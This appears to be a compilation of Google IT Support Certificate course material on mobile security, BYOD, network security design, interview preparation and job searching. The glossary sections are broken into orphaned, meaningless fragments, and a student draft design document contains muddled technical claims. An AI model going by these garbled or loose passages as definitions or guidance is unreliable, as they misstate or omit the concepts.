No protection is perfect.
So we should use defense in depth to protect the data on your mobile devices.
What if someone steals the device and reboots it or
takes it apart to get the storage directly?
To help protect against this, enable storage encryption on your mobile devices.
On some devices, this is done by default, but
if it isn't you should enable that feature.
We've talked a little bit about protecting your device from an outside attacker.
But what about protecting the data on your device from an app that's installed on
your device?
End users should be able to control which apps on their mobile device have access to
what data.
Let's look at how you can see which apps are using or
have access to use specific types of private data on your device.
Mobile operating systems have defined permissions that control which
app has access to which systems or data.
Each OS has a list of permissions and
the app requests access to the specific permissions that it needs.
Mobile apps will request permission either when they are first installed or
when they first try to use the permission.
At times an end user might deny an app access to a permission that it needs,
making that app unable to function properly.
It might be up to you to help them troubleshoot app permissions.
For example,
one permission controls access to information about the devices location.
A mobile device can use its GPS, cellular networking and
Wi-Fi networking to determine the location of the device.
Determining the devices location uses a lot of battery power,
and it's also very sensitive from a privacy point of view,
still knowing the location of the device is critical for some apps.
For example, obviously the app that you use for mapping and
navigation needs to know where the device is.
You can turn a mobile devices location services on and off.
You can also use the app permission settings on your device to control which
apps have access to location services when they are on.
Let's take a look, here's how to do it in android.
Here's a list of all the permissions that apps can request and if I select one,
I can see and control which apps have access to my device's location.
I can do the same thing in IOS and with other permissions, for example, let's
check which apps have access to record sounds through the devices, microphone.
So here I have an iPhone, from the privacy setting, I can view all of the different
categories of private data and control which apps have access to which data.
If I select one, I can see and control which apps have access to my devices,
microphone.
Android and IOS Use different names for the type of permissions and
private data that they can grant to apps.
But the basics are the same.
Supplemental Readings for Mobile Security

and Privacy
Check out the following links for more info:
 Set screen lock on an Android device

 Change access to items when iPhone is locked
 Use a passcode with your iPhone, iPad, or iPod touch
 Control your app permissions on Android 6.0 and up
 Change app access to private data
Bring Your Own Device

BYOD
In this reading, you will learn about a business practice called “bring your own device” (BYOD), as well as
the security risks related to BYOD policies and how to mitigate these risks. Organizations can reduce IT
costs by limiting the number of company-owned mobile devices issued to employees. Instead, businesses
are passing on the costs of mobile devices and cellular services to employees by allowing employees to
bring their own devices for business use.
Bring your own device (BYOD)
Traditionally, IT departments would provide mobile devices to employees for business use. This gave the IT
staff control over the security of those devices. Today, an increasing number of companies permit
employees to bring their own devices to work. This trend started with employees requesting permission to
carry a single smartphone rather than carrying one phone for work and one for personal use. Organizations
noticed the cost savings gained by allowing their employees to select their personal smartphones as the
single device. By using smartphones with dual SIM card slots or phone apps like Google Voice, users can
configure multiple phone lines on a single smartphone. However, BYODs can become dangerous security
threats to companies’ data and networks. IT departments do not have the same level of control over the
security of BYOD devices as they would with company-owned devices.
BYOD Threats
Some of the potential threats BYODs pose to company networks, resources, and data include:
 Loss or theft could result in an organization’s data being stolen or the lost device being used to
gain unauthorized access to a company’s network.
 Data loss, including:
1. Data leakage losses can happen when a computing device is lost or compromised; when an
employee accidentally saves or sends confidential information to the wrong destination; when a
disgruntled employee exposes data maliciously; or when viruses, malware, phishing attacks, etc.
penetrate organizations’ networks.
2. Data portability losses can occur when former employees take company data with them on their
BYOD when they resign or are fired by the organization.
 Security vulnerabilities are any type of weakness in the security of a device or network that
provides access for a threat to penetrate the system.
 Meddler in the middle attacks (MITM) occur when an attacker monitors the data transfers
between two sources with the intent to copy and/or interfere with that information. One of the
most common opportunities for an MITM attack arises when a mobile device accesses important
information through a public Wi-Fi connection, such as at a hotel or restaurant.
 Malware is malicious software that can be used to steal, modify, or delete data. It can also be used
to gain unauthorized access to a device or network.
 Jailbreaking happens when a manufacturer’s protective restrictions are removed on a mobile
device. Without these restrictions, a device becomes vulnerable to the risk of the user unknowingly
installing malicious software.
Solutions
To mitigate these threats, organizations and their IT departments should design security policies for BYOD
use inside company networks. Some preventative steps could include:
1. Develop a bring your own device (BYOD) policy: IT departments and organizations can create
written policies that detail the minimum technology requirements for permitted BYODs, provide
instructions for employees on how to properly secure their devices, and list the rules for safe data
access and storage.
2. Use Mobile Device Management (MDM) software: MDM software can be used to enforce BYOD
policy requirements for mobile devices to help secure company data and networks. IT
departments can use MDM software to:
a. Automatically install apps and updates, including antivirus and anti-malware software
b. Configure secure connections to an organization’s wireless networks
c. Encrypt storage on devices
d. Require a lock screen and password
e. Remote wipe a mobile device that is lost or stolen
f. Block the execution of certain apps
g. Meet compliance standards
h. Prevent data being shared or stored in unauthorized locations
i. Manage devices remotely
3. Use an Enterprise Mobile Management (EMM) system: MDM policies are specific to mobile
operating systems. In order to distribute MDM policies across Android, iOS, and other mobile
operating systems, the BYODs can be enrolled through an Enterprise Mobility Management (EMM)
system.
4. Require the use of multi-factor authentication (MFA): Users can be authenticated by presenting
more than one method of identification. Some common identification factors include:
a. Something you know: a password or pin number
b. Something you have: a physical token, like an ATM or bank card, USB device, key fob, or
OTP (one-time password)
c. Something you are: biometric data, like a fingerprint, voice signature, facial recognition,
or retina scan
d. Somewhere you are: location-dependent access, like a Global Positioning System (GPS)
location
e. Something you do: gestures, like swipe patterns; Turing tests, like CAPTCHA; or normal
patterns of behavior, like regular login and logout times
5. Set an acceptable use policy (AUP): Organizations could create policies that set a code of conduct
for use of the companies’ data, systems, network, and other resources.
6. Use non-disclosure agreements (NDA): Organizations can create legally binding contracts with
employees to assert the confidentiality and security policies for the companies’ data and
intellectual property.
7. Restrict data access: IT departments should protect company data by limiting access to only those
employees who need access to perform their jobs.
8. Educate staff about data security: Organizations can provide training manuals and seminars to
inform employees about network security risks and to instruct on how to secure their BYODs.
9. Back up device data: IT departments need to create backup policies for all important data. This
should include a schedule for frequency of backups, storage space for the back-up copies, how
long back-ups should be stored, and disaster recovery plans.
10. Data leakage prevention (DLP): IT departments can implement DLP software solutions to help
manage and protect confidential information.
Key takeaways
Organizations are taking advantage of the cost savings created by adopting “bring your own device”
(BYOD) policies for employees. However, permitting employees to connect personal mobile devices to
company networks introduces multiple security threats. There are a variety of security measures that IT
departments can implement to protect organizations’ information systems:
 Develop BYOD policies

 Enforce BYOD policies with MDM software
 Distribute MDM settings to multiple OSes through EMM systems
 Require multi-factor authentication (MFA)
 Create acceptable use policies for company data and resources
 Require employees to sign NDAs
 Limit who can access data
 Train employees on data security
 Back up data regularly
 BYOD (bring your own device) - Additional information on how BYOD works, why is it important,
level of access options, risks, challenges, policy comparisons, best practices, how to implement a
BYOD policy.
 BYOD policy: An in-depth guide from an IT leader - Compares BYOD advantages and disadvantages,
what should be included in a BYOD policy, tips for reducing security risks, and more.
 What is MDM? - Introduces the purpose of MDM software, how it works, advantages of using MDM,
use cases, and more.
 Enterprise Mobility Management (EMM) - Outlines the features, services, and benefits of EMM
systems.
TIPS FOR INTERVIEW
The typical interview for IT support candidate

is going to be some form of role-playing.
Are you able to communicate with
a wide range of individuals?
Are you able to communicate
very difficult concepts to
people who may not have
such a strong technical background?
Often, they will use past examples of
real-life situations and role-play
those with you in the interview.
They want to see how you handle that,
especially if they throw in someone
who has had a really bad day and comes to
you with the problem that was
the last straw that broke the camel's back.
They want to see if your approach is
just a brute-force method to solve the problem.
Or if you're taking a creative,
efficient approach to solving something,
doing this in a pot with a positive attitude and leaving
the user feeling empowered
to solve these problems for themselves in the future.
It can help to practice in person,
practice over the phone, practice over video.
Because in today's world,
you're supporting people on all three mediums.
Each one will have a little tweak of how soft skills
can play a big role
in the relationship you have with the user.
TIPS FOR INTERVIEW
[MUSIC]
It's very important to do prior research on the role and
company that you're interviewing for.
You want to make sure that you have some questions in advance prepared for
your interview on those two things.
So in terms of the role, feel free to ask your interview,
their perspective on the day to day of what you'll be doing.
In terms of asking questions about the company,
you want to show that you have some of the same values and
admission that the company has and asking questions along those lines.
Outside of soft skills, some of the qualities that and hiring manager or
interview maybe looking for are going to be, are you showing that
you have a methodical approach to the way that you're approaching the problem?
Another quality that hiring managers or interviews maybe looking for
is the ability to problem solve.
IT professionals are not going to know everything about IT, but
you do want to show that you are able to think on the spot, challenge yourself and
still walk through a scenario even if it is a bit unfamiliar to you.
In order to prepare for the troubleshooting and problem solving aspect
of the interview, a good way to do that is to practice via mock interviews.
So that you do get in the art and the exercise of being able
to walk out and talk out your thought process.
Find yourself a person that can run through some questions with you whether
that be a roommate, a relative.
Identify some questions that they can ask you,
real life scenario questions that you've either encountered or
haven't encountered before and have them ask those questions.
Practice walking out something that you're not as familiar with, and practice your
communication skills in delivering that, even if you're not sure of the answer.
INTERVIEW ROLE TIPS
Hi, I'm Rob.

I'm Candice.
Congrats on making it through this course.
Now that you've made it this far,
we're here to give you
a sneak peek into what an interview on
the technical subjects covered
by this course might look like.
We hope this will help you have a better idea
what to expect in your next interview.
Just already keep learning and keep practicing.
In this scenario, let's say I'm a small business owner

and I only have about 15 employees,
but I expect it to grow over the next couple of years.
I had a friend who was hacked that lost
a lot of sensitive data,
but I want to make sure I understand how to
prevent that happening from my business.
Walk me through some best practices for network security.
You want to list out all the services
that you'll need on a network,
and then you also want to disable
all the services that you won't use.
This principle can be
applied to all aspects of your infrastructure.
For example, we have a firewall,
we can configure it to allow all the services
that you want and then disable
all the services that you don't want,
so it will block all that traffic.
Interesting. Why do we use
that philosophy or what does that philosophy called?
We'll use this because it
allows for you to
not have vulnerabilities to slip through,
and this is also called whitelisting
, instead of blacklisting.
Why would we disable things that I wouldn't be using?
The reason why we want to
restrict these services that you won't use is
because it will allow you
to know what's coming in because you know what
you have allowed instead of having
some services block because it
will allow more vulnerabilities to come through.
Good. What are some other things that I might need?
Another thing you might need
is a network monitoring solution.
This will be helpful because they'll allow you to
identify traffic that's coming through your network.
One other thing that comes up,
I worked with a lot of contractors,
and a lot of times they'll bring
their own machines onto our network.
Is there anything I need to be concerned about with
them connecting to my network with their own machines?
Yes. You want to restrict those machines just
because you don't control them
and you don't know what's on them.
I would say we could set up a different segment on
the network or we can have a different wireless network.
Good. Yeah, so wireless is actually really
important and I do want to have a wireless network.
How do we actually secure the wireless network?
What would be some things that we can implement there?
We can use strong encryption like WPA2.
What is WPA2? Why is that
better than some of the other encryption method?
WPA2 improves the security of a network
because it has a stronger encryption method called AES.
The last thing I wanted to ask you
about was phishing attacks.
I've heard that this is a common way
for hackers to get passwords and things like that.
I want to make sure that my employees don't get
hacked by a phishing attack. How do we prevent that?
You want to have your employees use strong passwords.
You can set the password requirements to have symbols,
numbers, uppercase and lowercase letters.
You want to have your employees change
their passwords a few times throughout the year,
also have them use two-factor authentication,
and you can just educate
your employees just to let them know not to
open up suspicious emails or
emails from senders that they don't know.
Can you explain what two factor is real quick?
Yes. Two-factor authentication is
two variations of authentication methods,
and the authentication methods can be either a password,
fingerprint, something that's related to biometrics,
or it can also be a security chip.
Great. I didn't know that. Thanks very much.
Thanks.
In this scenario, we've seen
how important it is to clearly explain
yourself and to articulate
IT concepts and the advantages
of the technologies chosen.
In a technical interview,
they're going to be a lot of technical
concepts that need to be explained.
It's important to keep calm
and describe them without panicking.
This was our last role-play
in the last course of the program.
Congratulations on making it all the way here.
We hope these roleplays may have helped you get
a better idea of what
your next interview might look like.
You may want to review all the tips we
provided way back in the first course so
you're prepared and you nail
your IT support interview. Good luck.
Invitation to Sign Up for Big Interview

Since preparation is key to nailing interviews and landing a new job, we’ve worked with Big
Interview, an online interview preparation platform, to create interactive interview tools
specifically for IT Support Certificate learners like you.
We’re excited to be able to offer you 12 months of free access (a $79/month value) as part of
the Google IT Support Certificate! You’ve earned it. On Big Interview you can:
 Practice answering interview questions in a recorded environment that allows you to

get feedback and hone your interviewing skills
 Prepare a resume using their resume-building tool

Follow the steps below to sign up for your Big Interview account and start practicing!
1. Go to https://googlecerts.biginterview.com/.
2. Click Register.
3. Register with your name, email address, and password.
4. Log in.
5. Go to the Learn page.
6. Click Google Certificates Practice Sets.
7. Choose IT Support to begin practicing!
Question 1
Overview: Now that you’re super knowledgeable about security, let's put your newfound know-how to the
test. You may find yourself in a tech role someday, where you need to design and influence a culture of
security within an organization. This project is your opportunity to practice these important skillsets.
Assignment: In this project, you’ll create a security infrastructure design document for a fictional
organization. The security services and tools you describe in the document must be able to meet the needs
of the organization. Your work will be evaluated according to how well you met the organization’s
requirements.
About the organization: This fictional organization has a small, but growing, employee base, with 50
employees in one small office. The company is an online retailer of the world's finest artisanal, hand-
crafted widgets. They've hired you on as a security consultant to help bring their operations into better
shape.
Organization requirements: As the security consultant, the company needs you to add security measures
to the following systems:
 An external website permitting users to browse and purchase widgets

 An internal intranet website for employees to use
 Secure remote access for engineering employees
 Reasonable, basic firewall rules
 Wireless coverage in the office
 Reasonably secure configurations for laptops
Since this is a retail company that will be handling customer payment data, the organization would like to
be extra cautious about privacy. They don't want customer information falling into the hands of an
attacker due to malware infections or lost devices.
Engineers will require access to internal websites, along with remote, command line access to their
workstations.
Grading: This is a required assignment for the module.
What you'll do: You’ll create a security infrastructure design document for a fictional organization. Your
plan needs to meet the organization's requirements and the following elements should be incorporated
into your plan:
 Authentication system
 External website security
 Internal website security
 Remote access solution
 Firewall and basic rules recommendations
 Wireless security
 VLAN configuration recommendations
 Laptop security configuration
 Application policy recommendations
 Security and privacy policy recommendations
 Intrusion detection or prevention for systems containing customer data
 This document describes how the functional

and nonfunctional requirements recorded in
the Requirements Document and the
preliminary user-oriented functional design
based on the design specifications.
 Furthermore, it describes the design goals in
accordance with the requirements, by
providing a high-level overview of the system
architecture, and describes the data design
associated with the system, as well as the
human-machine scenarios in terms of
interaction and operation. The high-level
system design is further decomposed into low-
level detailed design specifications including
hardware, software, data storage and retrieval
mechanisms and external interfaces.
 Purpose of the Security Infrastructure
Design Document
 The Security Infrastructure Design Document
helps to document and track the necessary
information required to effectively define
architecture and system design in order to
give the guidance on the security architecture
of the IT environment that is going to be
established.
 2. General Overview and Design Approach
 2.1 General Overview
 The client requires an IT infrastructure to
perform their business activities that involve e-
commerce applications and internal VPN
access for their customers as well as
employees with a high priority on the security
and privacy of customer information and of the
client’s as well
 2.2 Assumptions/Constraints/Risks
 Assumptions
 It has been assumed that the employees are
increased by 5% every year thereby reflecting
the usage of the network bandwidth and
increase of the devices that are connected to
the enterprise network infrastructure.
 Constraints
 The following are the key considerations
associated with the security of the
infrastructure:
 · Authentication system
 · External website security
 · Internal website security
 · Remote access solution
 · Firewall and basic rules recommendations
 · Wireless security
 · VLAN configuration recommendations
 · Laptop security configuration
 · Application policy recommendations
 · Security and privacy policy
recommendations
 · Intrusion detection or prevention for systems
containing customer data
 Risks
 Since the infrastructure is meant to carry out
the e-commerce related transactions that may
involve third party merchant authorizations
and financial related issues, a strict security
mechanism needs to be enforced so as to
ensure that there is no such issue related in
customers transactions as it may affect the
reputation of the organization.
 Additionally, there should be a backup
mechanism to take the data backups at
regular intervals to deal with any unwanted
situations like system failures, attacks by
intruders etc.,
 2.3 Alignment with Federal Enterprise
Architecture
 The proposed architecture strictly complies
with federal Enterprise architecture, All the
protocols being used, and the hardware
interfaces used compiles with the industry
standards as specified so as to ensure
compatibility of the networks as well as the
security in compliance with CMS Enterprise
Architecture (EA)
 3. Design considerations
 3.1 Goals:
 The following are the desirable outcomes
of the security infrastructure proposed to
be implemented in the organization:
 · An external website permitting users to
browse and purchase widgets securely.
 · An internal intranet website like that of a
VPN for employees to use
 · Secure remote access for engineering
employees
 · Reasonable, basic firewall rules
 · Wireless coverage in the office
 · Reasonably secure configurations for
laptops
 · Privacy of the user data
 3.2 Architectural Strategies
 For external website to perform purchase
activity by customers:
 In order to provide a secure e-commerce
transaction, the following are the primary
which security goals include:
 · Protecting confidentiality of the data
 · Making sure that unauthorized persons or
systems cannot access the information of
users;
 · Making sure that the information accessed is
genuine;
 · Making the data accessible and usable;
 · Logging the transactions for further
reference and support activity
 · Verifying the authenticity of a person to
perform a transaction.
 1. For intranet website accessed by
employees:
 Since the data is accessed by the company
employees only it should be only available to
company’s level of access making it private
from other information being maintained on
the infrastructure So,the following are the
considerations in this case:
 · Making sure that the access is within their
intranet by implementing a firewall mechanism
 · Specifying the authentication mechanism to
access the website by the employees
 · Supervising the activities and user
management on the website by an
administrator
 1. Secure remote access for engineering
employees
 We can perform safe implementation of
remote access control objectives based on the
following security considerations:
 Device type: What device types require
remote access?
 Role: What remote access is appropriate for
that role given the device used?
 Location. Is access from a public location,
another company site, internal wireless, etc.?
 Process and data: What processes and data
are accessible given the first three access
characteristics?
 Authentication method: Does the need for
strong authentication increase based on the
device used, where it is used, and what it is
allowed to access?
 1. Basic firewall rules to be implemented:
 Block by default – to block all incoming and
outgoing connections
 Allow specific traffic – only allow specified IP
addresses
 Allow Inbound-only allowing intranet users
 1. Wireless coverage in the office
 Can be provided with an 802.11 WLAN
adapter/router with PSK(pre-shared key)
configuration or a login based limited access
to company WIFI by the employees
 Security considerations: Should be Password
protected and metered
 1. V-LAN Configuration:
 VLAN network segmentation creates security
zones that enables flexible and strong control
of what a remote user can access. security
zones separating incoming traffic from internal
resources. Using dynamic VLAN assignments
and access control lists, we can control user
access based on the conditions
 1. Laptop Security configuration:
 One of the most vulnerable parts of the
infrastructure is the laptop computers that
employees use. These devices can be
responsible for bringing in viruses or malware
or causing the organization to lose sensitive
data. This can be checked using the
techniques such as:
 · Encrypting the disks on the laptops
 · Ensuring Antimalware/Antivirus are up to
date in regular intervals
 · White listing the devices on the network
 · Running a product such as System Center
Configuration Manager, LANDesk, Altiris, or
some other systems management platform
 1. Application policy recommendations
 · Integrate secure coding principles in all
software components of infrastructure.
 · Perform automated application security
testing as part of the overall application testing
process.
 · Development and testing environments
should redact all sensitive data or use de-
identified data.
 · Compliance with industry standard data
policies and protocols
 1. Security and privacy policy
recommendations
 Explain How the organization Collects and
Use Personal Information
 · Cookie Policy – Cookies are used to store
user preferences or shopping cart contents.
Clearly explain your cookie practice.
 · How organization will Share Customer
Information – Customers need to know that
their data will only be used to complete the
transaction and that any further use of that
data (including selling or distributing it)
requires their consent.
 · Contact Information – Make it easy for your
customers to contact you or file a complaint.
 Display Privacy Policy Make sure new
customers or users have easy access to your
policy mandatorily
 Publish Email Opt-Out Policies – Include
opt-out options in your email marketing
 Get a Seal of Approval – Third party
validation of your online privacy and security
policy can enhance your credibility. And trust
of security
 Intrusion detection or prevention for
systems containing customer data
 As the demand for E-Commerce grows on the
Internet so will the increasing potential for E-
Commerce sites to be attacked. Implementing
security methodologies pertaining to an E-
Commerce environment is not a simple thing.
It should consider various threats and
anomalies that can cause an attack. This can
be achieved though penetration testing and
reverse engineering to detect by signature or
by an anomaly. This can be achieved by a
third-party IDS system readily available in the
market
 Summary
 Thus, we can conclude the report of the
security infrastructure of the organization
has been assessed and recommendations
were made as required for the proposed
environment as specified
 Key assets being protected:
 Customer information, Company related
information
 Key threats to protect against:
 Intrusion to website, Data Loss
 Key activities to protect against:
 Customer purchase of artifacts, payment
transactions, employee data
 Relative ranking of fundamental security
goals:
 This is an important exercise for every
organization as part of the risk mitigation
planning process. For this project, the ranking
came out like this:
 Confidentiality: high
 Integrity: high
 Availability: medium
 Auditability: medium
 Nonrepudiation: N/A
Final Project - Sample Submission

Authentication
Authentication will be handled centrally by an LDAP server and will incorporate One-Time
Password generators as a 2nd factor for authentication.
External Website
The customer-facing website will be served via HTTPS, since it will be serving an e-commerce
site permitting visitors to browse and purchase products, as well as create and log into
accounts. This website would be publically accessible.
Internal Website
The internal employee website will also be served over HTTPS, as it will require
authentication for employees to access. It will also only be accessible from the internal
company network and only with an authenticated account.
Remote Access
Since engineers require remote access to internal websites, as well as remote command line
access to workstations, a network-level VPN solution will be needed, like OpenVPN. To make
internal website access easier, a reverse proxy is recommended, in addition to VPN. Both of
these would rely on the LDAP server that was previously mentioned for authentication and
authorization.
Firewall
A network-based firewall appliance would be required. It would include rules to permit traffic
for various services, starting with an implicit deny rule, then selectively opening ports. Rules
will also be needed to allow public access to the external website, and to permit traffic to the
reverse proxy server and the VPN server.
Wireless
For wireless security, 802.1X with EAP-TLS should be used. This would require the use of
client certificates, which can also be used to authenticate other services, like VPN, reverse
proxy, and internal website authentication. 802.1X is more secure and more easily managed
as the company grows, making it a better choice than WPA2.
VLANs
Incorporating VLANs into the network structure is recommended as a form of network
segmentation; it will make controlling access to various services easier to manage. VLANs can
be created for broad roles or functions for devices and services. An engineering VLAN can be
used to place all engineering workstations and engineering services on. An Infrastructure
VLAN can be used for all infrastructure devices, like wireless APs, network devices, and critical
servers like authentication. A Sales VLAN can be used for non-engineering machines, and a
Guest VLAN would be useful for other devices that don't fit the other VLAN assignments.
Laptop Security
As the company handles payment information and user data, privacy is a big concern.
Laptops should have full disk encryption (FDE) as a requirement, to protect against
unauthorized data access if a device is lost or stolen. Antivirus software is also strongly
advised to avoid infections from common malware. To protect against more uncommon
attacks and unknown threats, binary whitelisting software is recommended, in addition to
antivirus software.
Application Policy
To further enhance the security of client machines, an application policy should be in place to
restrict the installation of third-party software to only applications that are related to work
functions. Specifically, risky and legally questionable application categories should be
explicitly banned. This would include things like pirated software, license key generators, and
cracked software.
In addition to policies that restrict some forms of software, a policy should also be included to
require the timely installation of software patches. “Timely” in this case will be defined as 30
days from the wide availability of the patch.
User Data Privacy Policy

As the company takes user privacy very seriously, some strong policies around accessing user
data are a critical requirement. User data must only be accessed for specific work purposes,
related to a particular task or project. Requests must be made for specific pieces of data,
rather than overly broad, exploratory requests. Requests must be reviewed and approved
before access is granted. Only after review and approval will an individual be granted access
to the specific user data requested. Access requests to user data should also have an end
date.
In addition to accessing user data, policies regarding the handling and storage of user data
are also important to have defined. These will help prevent user data from being lost and
falling into the wrong hands. User data should not be permitted on portable storage devices,
like USB keys or external hard drives. If an exception is necessary, an encrypted portable hard
drive should be used to transport user data. User data at rest should always be contained on
encrypted media to protect it from unauthorized access.
Security Policy
To ensure that strong and secure passwords are used, the password policy below should be
enforced:
 Password must have a minimum length of 8 characters
 Password must include a minimum of one special character or punctuation
 Password must be changed once every 12 months
In addition to these password requirements, a mandatory security training must be
completed by every employee once every year. This should cover common security-related
scenarios, like how to avoid falling victim to phishing attacks, good practices for keeping your
laptop safe, and new threats that have emerged since the last time the course was taken.
Intrusion Detection or Prevention Systems

A Network Intrusion Detection System is recommended to watch network activity for signs of
an attack or malware infection. This would allow for good monitoring capabilities without
inconveniencing users of the network. A Network Intrusion Prevention System (NIPS) is
recommended for the network where the servers containing user data are located; it contains
much more valuable data, which is more likely to be targeted in an attack. In addition to
Network Intrusion Prevention, Host-based Intrusion Detection (HIDS) software is also
recommended to be installed on these servers to enhance monitoring of these important
systems.
Supplemental Reading for SHA1 Attacks

During the 2000s, a bunch of theoretical attacks against
SHA1 were formulated and some partial collisions were
demonstrated. In early 2017, the first full collision of SHA1
was published.
Supplemental Reading for the X.509 Standard

For more information about this topic from this Video Lecture check out the following
link. The X.509 standard is what defines the format of digital certificates.
Supplemental Reading for PGP

PGP was developed by Phil Zimmermann in 1991 and was freely available for anyone to
use.
Supplemental Reading for Securing Network

Traffic
The combination of L2TP and IPsec is referred to as L2TP/IPsec and was officially
standardized in IETF RFC 3193.
An example of this is OpenVPN, which uses the OpenSSL library to handle key exchange
and encryption of data along with control channels.
Supplemental Reading for Securing Network

Traffic
The combination of L2TP and IPsec is referred to as L2TP/IPsec and was officially
standardized in IETF RFC 3193.
An example of this is OpenVPN, which uses the OpenSSL library to handle key exchange
and encryption of data along with control channels.
Supplemental Reading for TPM Attacks

There’s been one report of a physical attack on a TPM which allowed a security
researcher to view and access the entire contents of a TPM.
Module 2 Glossary


longer valid
with



packets
into ciphertext
ciphertext

IPv6

except for the key

MD5: A popular and widely used hash function designed in the early 1990s as a
cryptographic hashing function

Public key signatures: Digital signature generated by composing the message and
combining it with the private key

messages over time
certificate
sent back and forth
published in 1995
secure
to
ciphertext
decrypt messages


network to another
with new headers


public keys

A
should have it
something
D
sort of ransom
of computers
database

T
network
Qwiklabs Introduction
For some of your graded assessments, you’ll use the Qwiklabs tool to complete the assigned
activities. Qwiklabs is an online lab tool that creates simulated Windows and Linux OS
environments. With this tool, you can complete the course activities without having to install
extra software on your computer.
Important details
Qwiklabs allows you to use both Linux and Windows operating systems as if they were
installed on your local machine. When you access your Qwiklabs activities through Coursera
you will be given the software and OS setup needed to complete the activity within the tool.
Make sure to always access labs directly through Coursera (not through the Qwiklabs
catalog). If you do not access labs directly through Coursera, you will not receive a grade.
Here are some things to be ready for when using Qwiklabs:

 Unless stated otherwise, you will have 60 minutes to complete each Qwiklabs
assignment.
 You'll experience a delay as the labs load. Also expect delays when the Linux and
Windows simulated environments boot up.
Each lab connects you to a new Qwiklabs simulated environment. Each time, temporary
credentials are created for you to connect to the lab. These credentials expire at the end of
the lab assignment.
 Click “Start Lab” to begin your assessment activity.

 Click “End Lab” to end the activity.
o The lab needs to run for at least 5 minutes for your activity’s score to be shared
back to Coursera. If you click the "End Lab" button before 5 minutes pass, your
score may be recorded incorrectly in Coursera.
o Your grade is calculated when the lab is complete. Be sure to click the "End
Lab" button when you've finished the assignment.
o After you end the lab, you won't be able to access your previous work.
If you receive an error message while completing a lab, please reach out to the Qwiklabs
support team through the chat support option in the lab’s ‘help’ menu.
Resource
Contact Qwiklabs Support
You want to make sure that your resume is up to

date and you want to make
sure there are no typos on that resume.
Tweak your resume and adjust
it to where everything you have on your resume
seems like it's more IT oriented
because almost every job has an IT aspect.
One of the many ways
the Google IT Support Certificate program prepare you,
there was a section of mock interviews,
how to conduct yourself during
an interview and that was very helpful.
That's one of the greatest confidence boosters
for anyone with any skill.
Make sure that you are asking questions.
Don't just sit there and nod your head.
Write down questions that you've been
asked that you felt
that you didn't have good enough answers for.
Go over those questions.
Practice school questions, write those answers out.
The more you prepare for it,
the more confident you can be
and sometimes you've got to fake it to
make it and if you can prepare
yourself and psych yourself into saying,
you know what, I've got this,
I know what I'm doing.
That confidence is going to show off.
You have to want it.
The same motivation and drive that got you through
the course is the same motivation
and drive that you should use in your job search.
How to Add Google IT Support Certificate to

Your Resume and LinkedIn Profile
Congratulations on earning your Google IT Support Professional Certificate! Now it’s time to
let the world know about your new certificate and the skills you gained to help advance your
career.
Below is a comprehensive list of skills that the Google IT Support Professional Certificate was
designed to develop, along with advice for adding them to your resume and LinkedIn profile.
GOOGLE IT SUPPORT PROFESSIONAL CERTIFICATE SKILLS LIST
 Basic computer architecture

 Operating systems (Windows, Linux)
 Remote connection and virtual machines
 Computer networking
 Software management
 Troubleshooting
 Customer service
 Routing concepts
 VPNs and proxies
 Permissioning
 Package and software management
 Process management
 Resource monitoring
 Systems administration
 Configuration
 Centralized management
 Implementing/managing directory services
 Data management and recovery
 IT security
 Cryptology/encryption
 Hashing
 Network security
ADDING GOOGLE IT SUPPORT CERTIFICATE TO YOUR RESUME
If you’d like to build your resume from scratch, make sure to scroll down to the bottom of this
page to download PDFs of resume templates to help you get started. Keep in mind, these are
just sample resumes, and you should customize them as you see fit!
To add the Google IT Support Professional Certificate to your current resume, you can follow
the steps below.
 List the certificate under the Education section of your resume. Example:
 Add the most relevant skills to the Skills/Proficiencies section of your resume. To
identify what’s most relevant, focus on your strongest skills, and the ones that are
most prevalent in the job descriptions for the roles you’re applying to. Example:
 If the Google IT Support Professional Certificate is your primary qualification for the
roles you’re applying for, you can include information about it in the Summary section
of your resume. Example:
LINKEDIN
 List the certificate under the Licenses & Certifications section of your LinkedIn Profile.
Example:
 Describe your Google IT training in the Summary (About) section of your LinkedIn
profile. It’s helpful to frame this credential in the context of your career if you have
previous experience. Learn more about writing an engaging LinkedIn summary.
Example:
 You can list your skills under the Skills section of your LinkedIn profile and collect
endorsements from your network. Example:
 Consider including the certificate in your LinkedIn headline. Example:
Common Job Search Terms

Keywords to start your online job search
Searching for jobs is all about casting a wide net. We recommend that you spend time on
common job sites like Indeed, Glassdoor, and Google for Jobs, using common job search
terms to help you find IT support roles. (See example searches on these sites below.) Here are
some search terms to get you started:
 Technical Support Specialist

 IT Help Desk
 Help Desk
 IT Technician
 IT Support Specialist
 Computer User Specialist
 IT Helpdesk Technician
 Computer Support
 Technical Support Specialist, Level 1
 IT Assistant
Now, try plugging them into job sites:
Indeed: www.indeed.com
Glassdoor: www.glassdoor.com
Google for jobs

Module 6 Glossary
Data exfiltration: The unauthorized transfer of data from a computer. It's also a very
important concern when a security incident happens
Data handling policies: Should cover the details of how different data is classified
Entry point: the act to determine the entry point to figure out how the attacker got in, or
what vulnerability the malware exploited
High value data: usually includes account information, like usernames and passwords.
Typically, any kind of user data is considered high value, especially if payment processing is
involved
Impact: The impact of an incident is also an important issue to consider
PCI DSS: Payment Card Industry Data Security Standard
Penetration testing: The practice of attempting to break into a system or network to verify
the systems in place
Principle of least privilege: Helps to ensure that sensitive data is only accessed by people
who are authorized to access it
Privacy policies: Oversees the access and use of sensitive data
Recoverability: How complicated and time-consuming the recovery effort will be

Security: It's all about determining risks or exposure understanding the likelihood of attacks;
and designing defenses around these risks to minimize the impact of an attack
Severity: Includes factors like what and how many systems were compromised and how the
breach affects business functions
Threats & password policies: Protects Data & IP, Data Protection, Infrastructure Defense,
Identity Management, and users
Vendor risk review: Questionnaire that covers different aspects of their security policies
procedures and defenses
Vulnerability scanner: Detect lots of things, ranging from misconfigured services that
represent potential risks, to detecting the presence of back doors and systems

A
Antivirus software: It monitors and analyze things like new files being created or being
modified on the system in order to watch for any behavior that matches a known malware
signature
Application policies: Defines boundaries of what applications are permitted or not, but they
also help educate folks on how to use software more securely
Attack surface: It's the sum of all the different attack vectors in a given system
Attack vector: Method or mechanism by which an attacker or malware gains access to a

network or system
access to
should have it
something
Bastion hosts or networks: A server used to provide access to a private network from an
external network
Binary whitelisting software: It's a list of known good and trusted software and only things
that are on the list are permitted to run


longer valid
longer valid
with

Defense in depth: The concept of having multiple overlapping systems of defense to protect
IT systems

of attacks
packets
into ciphertext

protocol
File-based encryption: Guarantees confidentiality and integrity of files protected by

encryption
ciphertext


Host-based firewalls: Protects individual hosts from being compromised when they're used
in untrusted and potentially malicious environments
should be denied

IPv6
except for the key
